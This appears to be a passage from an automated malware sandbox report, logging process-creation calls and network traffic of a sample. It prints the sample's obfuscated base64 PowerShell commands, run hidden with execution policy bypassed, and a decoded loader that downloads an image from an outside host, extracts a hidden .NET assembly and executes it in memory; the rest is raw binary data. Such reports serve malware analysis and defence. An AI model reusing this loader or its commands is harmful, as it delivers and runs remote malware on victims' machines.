XsYGNZgPzXsYGNnPzXsYGNCPzXsYGNPzXsYGNLPzXsYGNPzXsYGNgPzXsYGNCcPzXsYGNZPzXsYGNBhPzXsYGNGQPzXsYGNcwBhPzXsYGNCcPzXsYGNIPzXsYGNPzXsYGNsPzXsYGNCPzXsYGNPzXsYGNJwBkPzXsYGNGUPzXsYGNJwPzXsYGNgPzXsYGNCwPzXsYGNIPzXsYGNPzXsYGNnPzXsYGNGMPzXsYGNdQPzXsYGNnPzXsYGNCkPzXsYGNKQPzXsYGN=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f0
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2772
thread_handle: 0x0000044c
process_identifier: 2768
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm9hbGloc2FtLzEyMS43Mi40MTIuNTkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received We7üvód DzA+¹ çÝfx¢µåFDOWNGRD QâV2sÇé^/Û×^øz‹l¢êºÉ×ÔÀJI¸vE³äÀÿ 
Data received ~
Data received K
Data received GAB§OUPÒÙV5¡>¢Hg^ø÷jÌ* åÿ5õèYŽ}óëå?+Ó$Ž„bÚM¨¾„„¶_¼áµ,TuÙå°‰ïbC@gŸ5[n¦Ms›;êÎ9Ôàl &<å­R28¦jÕ`mí¼î!5Ìäöºt”ùf?^?뢜LêíѤXÀ2´³&%Ày R×3/aàôY,]-ù±lïÀ¢akÁþ0R6©ªöfkpô yG©îGS#g›©´ÞæB2(†`€7ªžmbÁ<’¥g±ÜŸÄ0LN{‚nÿ÷È¥<èW`eøÐÖGÇ9° AS°ô1ÕlÊ¢.'»Ï®6B G³|µ6Ðå¦n úxy2‰-d%”xy:¸Fy9d/GcQbOZ2Ôÿ¯ó脯×I™]}&–Kác
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ð”ì ±Ã³žR!ëc;›„èošICÆlÅ$Ì+·JDÆÁ¬ãøc¿ƒ\€ÂŽSS>
Data received p
Data received q;|ÛYcâ¶L@@»ƒÓÅÆÝ¡:„oRвd«Õ>ùVæµ*O¡ôšx©7OAí H•L¼z¦Ö®4*[(Ówtó¼ Ô]Ÿ9Hsá(»J]jè…õ‚˜œÖö«BAÆÌÇ«!y؞«~ˆ2±ƒ[­&ýG™÷˜µ¬i¬3ÙVþ<èy'tË%ª‹J}Å €iÔåy¢µOî€ҁ˜*i®»âm9Û,ðÓ²­ý€ÎyEœàñäl ±•yxø¦•?™ä[û ÷b'æ0èRšKð­ Õå(ÊixÉià Îer,Žèb5¦*ÚBþ´yO¦“Ê„]ý;†Z` :q³ ›ÓµÁig¹LesCjëM_ßtJÁ2›‹‰ (´½Ä£bÁ`z6HA…¡wý¨à»ñâåNÅ«þ%Ðä>ö/¬Kñ##í_uh–3æž;áýê·RQõ`y­4¡dǸŒ,9³\s%`›„ªŸ±ÊV?1‘@Q;z†ÿ[¹ ¬éðú"s—o¤u› €BɼXêm£à*ìð^å'XÆ/±µÉ9ƒlL[E`fz»C>Ô΢èxqžRƒ‚×ׁh0ÛÆDaòÚuŠ-%‚_h !£Î΄Êë7c`ĕ"ú®I²y“)ž'›ƒ"ó"ÙÉ7raG½îëõ”à´Dȇï,4_ý”M¼è!iR[¾,¬oR'«¡<œ`~3—SéO5aP‚¯Ãç(Տ,r5ZäƪÅõoXÿ³|yÐó’4”3 fE6Î-/û*ÌhûïAñ)öx=7Qì7zdNºP»âÆsӞD…ö7½h7<¦Œ…ºp3ªëùèétúR¡,ç2#™mÑÛ³„e´Û|HC#Ý'°ÁpU{]ˆš~¶ …xËøǧz FòÇb-z㚧Á×­ÛâsŸÐÇsÙÿ«ÎwËGJé iVÖ$:Â\2ù(¦›æ5îdîmê“qõñë'.¡6EÁß=g¡Àú*í±&öb`ÃþD™n÷¯»“²ýKÔ½~ åT'$6‹²x'I†™'!þ0“‡'d÷dN>äÙÎÔ€îÏ `E¶Ò¤²z‡ÝˆWÜÒæ§zÂüçrDœ­€à-`›ÿÿ€Ö܉ٳòËáŸlILeb52"c?ó Iö[ÃUZ‰qŒŸEwG§˜$b®_ª5p¶sâó>‹€ ¸Ie4`USÔù£oîb!,ç-œþ7óPÙìÉi†»òÖéƁ Rêk?GB‰Èh߄Zyê‡qpÙ³RõÎô²­‹ºSÔP®…“xèçÂÒ0n)nÁÅ^eÞOê&Ç>-ÀŒtÑ) d²€ÊöçA@ŒÞý㌏‹#Ý©Û&×Ò#רPe5ї.™ä³_­]Ã^b™äxel4ü+ÏÿÈJ¿ÓÄÅü1@r/ª­ùrþ[½NJLÈè.†6*Q=«–žÇå>1 .ìàð%dۈS ʚ;2Àì(#ù ñ)¡H<ÉIa$uÊÔò«hyé•‚ÎŒbҘ¢Aüëkdò¡Nç#¾Jæ–wŸ*4É&º N ¾9ê âàL©së>§Oˆ~þ˜ÏtôÑQÉù=Ê@4~C¬e•! ӓa žºÈ)*d"›âRNêS(¥UÈïÃeö³SüáK´RЉ;[×ÿ$ ýÁæ¿õ‡r¯z„Q3§díJ¹\ЧBqO¾A³›ÂûíëËÒn¨,W>úðµ Ô9Ÿ3œÇÆ Êaƒiº³#k¾›3!‡ô¢Z À›9€h¥L´á
Data received Œx)ä£ aËã™RçšÏ—C Ì8ª£«æk9ÂË,^® ,]BöÉlwb¶óÜ ï¿³´ÒÆApTÐ!ï?bÃTèYy) U8çH·ù48Th2m2Îɔ*–àw1l­N@ ìªeÞ?ŸC.Š±¾‰žÐTƒ‚Õç8Æ1°Ïǒ+ãm^P›ÞÚI|ê'fAŽê¤ê§Ý3æú:¡{Ìç~&•1ù—î"9ïF÷þûqœâ7U8ІP’–—x„T§êu‰>è¢a)K 7MŠ&¬‘Ön»G‹%"œ'y`õ´Ø\ü~Š=W±)&7fµ›ZôèÕ?œOÅ»½ £–HU42Ãh ÿû=$KÊxw-Æp ³ŸÎVo¯j·D^qg=ȶWêt ZOp6–‰µNù1z 4 [hÌ Ý7Òl ÌÕ떊ææαÄɞ7!d¡Y½Eç&šk¶Z`>£¾0·Æ·‡y7~ Î]Ç=‡mð>WZ‚ÊK†S …VŒiƒY Ù͕/§Œ&u}¡IžÅ;Ï©¿\[‡²ˆ´o!°‘ÔöɈVa ž ëH‹ºÍ¨ò6ÝúaØҒ '-Y.Y¾ž[Œ–÷Ω\10ØÎ.,ÅCŽ Œ½Äo ւâùn¸ÿŸRèð‹f’âh˜=ϽãB*ê×`ŸG‹wÍÚÛêގô›¸Kw£±ˆ¼"h=z/Äã2¾t8vJºÆíÏ'ç©Äið€˜´ÀØ&x~9híïÕ¯_ã Ï ‘¾z¿èƜþµF–÷<x3FåÏùËâO•CÁ‚ádö.Ub¢s´´Æy«â&uS:nY ÈþDûWi‹¯~2OÿCÎ{˜’~ÜÊ{ƒµ°Hèâ]µÅ¤Nækš«Èülñ•½²Î† ìF2<š}Ü0£%÷”KJ;kà»fúBD]–0gç`J‡9—'Ð瞄ÚÐí\¿.UP”rړ¿Õ3°<´º`F!ï:kų– “Æ˺åt¡èY&§|ÓÝ vÍ8ÈǬ»z’‰­o ]#‘G$.k …¯‘^µ_p _kB:$ö¸²le¡(k1m¤dÜО[«1§¹sìæ±%ÈP}ЋóÈÕ)pf‰e•ëÛ°†ì¹t¦è<2ØÇïdÉa Ö®6NÒ¨Ïÿiâöö®|ôv‘nÉöƒÂqBô¤Yã]WLp²ÄkI£Ç/ŠÂ¤ÌŸY_û¨hø¤~ÄßBç+ëWmÕ´è_ Ç¥õGy²Õý×Á-XÕeÊ‡5>dìèò+“õeãØ<=´‚%>-vnõ„ÌrY~ñÁÃĕË6³£2ê"]Ç œE憊ò²º¾}zâ2Üg( ÛEó·<½¿ŽöÏýõ1£ûzX)y^)6þñ˘í!X=h-Çó3,¾õ(m¡5Cw¶3¶2-fÑo›’0’Gœ‘‡)fÖJEì>í­Âeµ¿ƒhÏJïxb­;÷ïש+åŸÓ5§{¼çŠêª!–NŽÆ¦‚0lÅÜ/@¸,Á‘À¹Ó|éã„ТlÍ£¾ê¢ø5y[§šd¨I­ÎuZ/…¼¿–|… ˜¹V.¢m-ª1¢Áø\¬&] Á ¿B´ ?imí{èÂy©Ô±ÿà–%VºûZ9LU1<Zú^ìn† 9“ò+ Æ6¦œÃÍG¸‡|ÅLsÿ&ÙÕ¼`^YI£ °¦7Líq…ë«z~pÂÉBe™òáj7c,¯PH0IN—kUè™.z|žKU
Data received ¼ ðPIwE©=Gdpåä2¶Iۑ)ýRÈãz.Ðéæj‚ªHTTŸ*=…Nٔ¨ì›$vú­ÕÀp@Cð.~“%e¹è»­t’Ÿ¶T׌$m_Á<"Ä}QraÔf̑/…< =±-óçZ ^ø胑'ôhôÀÚ^¡wŸ‡ÈF àtxÓßýB:Í„œˆ^mZØÀ®´ÀÏ(Ïø¼×û-7ˆääñzq@º›Vø5Šß+½÷PŒ’½/$7.Mì±wbÀ[«YEyÍZÞЭóUäːêzþ–8ì.ýŽ`¾w8eX™â¤#ä ò#ª†’Õ²0ª>\5´xB|ÓRÅ(Êþ>‡KëݸÖg½u¼™k÷Q`ù­þuÀ~Ëpª~ŠyåXI™G<*¤)yðõ m'½ÛmKcŸ-‘W"õ[bmT˜º¸î‘¯Ä X~³”¤ø3NyLV;mÇ]¾ˆPKXœQ¡ìçUõcv2êf&uZ¥¸°Ñ×rÆ2ù šZUÉ靎,,0ÍŒó°êX´½Põ§”>UIj Á<6®ð^²õ@¼`nAš«9tZÑn £ÏOÿðkízŠÂö†½ !)ÔëZMio^嗾ü#…‹g {}k¬ ¦!ø<€pÜà}{ù·§}9¶¤‡™Çü÷t_ɟ+ٕÁ3¦±hÅÄ~Уô#æmÜi)þLH\‡ÔK+ý?º™Ò#iºÅ DËkæ­¯#¢2¬&®Ð¡ø~ùñŠºÐ)Y·V•²†¦P5 ÞÆ#PT‰_­ê´šàˆòŸ×wvxµ‹Aö­|ªý¾‰üÁÄ)²òò)ì½h^ΒZ`l2æIõŽå´ó™(¦(ÃEZ´èt•7J–î»Ðß½ês°Ø¹5«›=wAñQä·" X•yÊ1µ™iÉ#zAA5&É 1©SìDšÊ×ôá(ìYFó}ÆÁ?æ¸Ub„=÷×z[Z”ˆ kÕέ”AÆ6Škâþ°¬ìXË\”Émrk[–O;B#€ökxÈ»¯¹Ðós§Œ'ýçH³<a†ºkù™ë2­.|&%™’cŠ,/n)6]Qdü4©Ø§FŎm:oƒÖÐmÒÚ°ÐsÓCl¢ûX·Üoÿ¡ž±ÁeÔ 7b[. =~í>ÿª—P$  Ù× îB§žÅ.¢y^Ñh‰TSO•½Ú71—a"Œ?P<¢D™´{hÄ¢¼‡B`Íý!AÉÕE=šª+#ZgÆýb=¶›áJl!!Gªƒ#—†BÀ¹-ñù†@»¢œŠð&FñÎ ò˜Fæ2Å_–Ó&øH6'f÷nM•õµhø‹^üî¥TxX>Où51³×nE–噈n!-%(ú=cN®ÃæƒYEx3²Ã‡òŒtUtÒû-øÙ¼%RäðÕ<ðáâžñ¢%ð·% {.jnЕa7V%m9Ê!/Lº\üɜÊBöJÐÌJ†D&ÔC¥1ë…@i1F")7‰É %'íK“L8T½ãG|ua»ŠԅµmKVíñp¦³áuü“Æ[á•ÑTfÇçëRnxƒ™Hu` /äœV!øÌã kEûxƒs¹ºfP¶’M] Â(¢`š¨Ñ7AÛ¡±ê®(Óö)Éä%¬ÖÉnÅh«mŠx±\å8wˆ'óŽÕ¼Yà ¨´@Íp`.Ë\”Ï*¥2LN"Lœ Šxò˜VßrÙãb¾–¯%ؐ,]¾pÏ[UԄÙA­íarQ¾Ù™òñ²"|Ec Q.ÈIM
Data received u¾ ìuß^ŠQf¾ƒžá\`³‡Î³þ²•O<”@D۟çÔ忕N´‚UqtÍ6ƒy½ýÍIK\'>®¹éLÅW¯ÉªDï±cÛꪎpjÓsºÏˆÉÀåuÇ8e¾Höþ¬Æ´ò7ñYÇGá„ÍèþŸ:Íyrðs †Ò[Uh…fZpOö]\jÍó‡sÖÁs|­+¼Ž'hBñƒSV¡ö¡¤Ñ8ºü2 ¨¸ {ñz×è£ÕjùõÚßýðÕI⫖ Æ;}+Pûæcà†^ÚÝ×,Møœwj(Ÿð]Øm÷ááäA­õ(ïúw:rYt²YD æƒâéäsŽE;GgÎc”é«}ÐRù uÁ§+¸ð0ê;ªÍ» Ñš~ ½oÒ^ofM[¬© ë!§L3íÀ«â_|Úm;gÁ¢Øz­D,ø=ÑßøC‘»ÿ`ÚHmüõ„€ ¤?y·x]©øJ'5wÄÓ؏DFFÑ`ì¦xœr»@eÀû¹%®k.–SfÁæñ”w5Ѽþü¶Î-*à²R´_÷ !“á!›¯OۗOÓ*MRg؆²Vºô.pr[i©NMɖ|p?yûÁ"’ÖÕ~?ÆŸF»›S>à<ž‡Ú<3xw©«Óô"Få֍.†úêæúç…ÍÆs9Àò$Ë1¼µôÒ7_廊Šãõ›Œzg Í0u͐~bF—á(2À•œ…¤Ó¸1=/X\žzØÔ¨zFßã6W0‡j)IÁÈb<opÉï” ;ËH<Mp¿"寒#ržýîáëÔ·c¶)é,ÏäÊ&»¬Ç!zË1@]@Ç25'+{O†ñƒ=lX(¿azjx&¨‹;× 